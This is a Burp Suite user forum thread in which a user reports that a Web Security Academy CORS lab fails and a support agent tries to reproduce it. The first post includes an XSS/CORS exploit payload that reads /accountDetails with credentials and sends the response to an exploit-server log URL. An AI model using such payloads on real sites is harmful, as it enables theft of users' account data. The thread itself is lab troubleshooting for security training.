Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab Not Working Anymore : CORS vulnerability with trusted insecure protocols

Achint | Last updated: Apr 12, 2024 09:22AM UTC

I am trying to solve the mentioned lab, with the payload provided by the academy, by the payload isn't working. When i view the payload, the request is indeed sent to stock subdomain, but it replies with "Unauthorized",since the cookie is not included in the request. ## Payload <script> document.location="http://stock.0ad000570345633e81fd1b55005d001d.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ad000570345633e81fd1b55005d001d.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a8d001a039663f481a91aaa0144009c.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1" </script> ## Response From /accountDetails HTTP/2 401 Unauthorized Content-Type: application/json; charset=utf-8 Set-Cookie: session=EgIsHteiGser2A2asuxMQRV1BMAKIFfg; Secure; HttpOnly; SameSite=None X-Frame-Options: SAMEORIGIN Content-Length: 14 "Unauthorized" I am using burp's in-built browser.

Achint | Last updated: Apr 12, 2024 09:25AM UTC

Found the solution, this is because lab is `setting secure flag on the cookie`, but the `mentioned payload specifies `http` for stock subdomain`, hence the cookie is not sent, kindly fix that.

Ben, PortSwigger Agent | Last updated: Apr 12, 2024 09:36AM UTC

Hi Achint, Having just run through this lab using the embedded browser in the latest version of Burp I am able to successfully solve it using the solution provided so it does still appear to be working as expected. Are you logged into the wiener user account when you come to carry out the 'View exploit' functionality and test your exploit?

Achint | Last updated: Apr 12, 2024 09:45AM UTC

Yes, i am logged in as wiener, when i do `View Exploit`, it does land me on the stock subdomain, but the request to /accountDetails returns "unauthorized", but changing the protocol from http to https for subdomain works.

Achint | Last updated: Apr 12, 2024 09:48AM UTC

# Console Error Access to XMLHttpRequest at 'https://0ad000570345633e81fd1b55005d001d.web-security-academy.net/accountDetails' from origin 'http://stock.0ad000570345633e81fd1b55005d001d.web-security-academy.net' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.

Ben, PortSwigger Agent | Last updated: Apr 12, 2024 11:02AM UTC

Hi Achint, Is it possible for you to send some screenshots or a video of the complete set of steps that you are using so that we can see this exactly? The behaviour that you are seeing is not what I am experiencing so getting some more details would be very useful.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.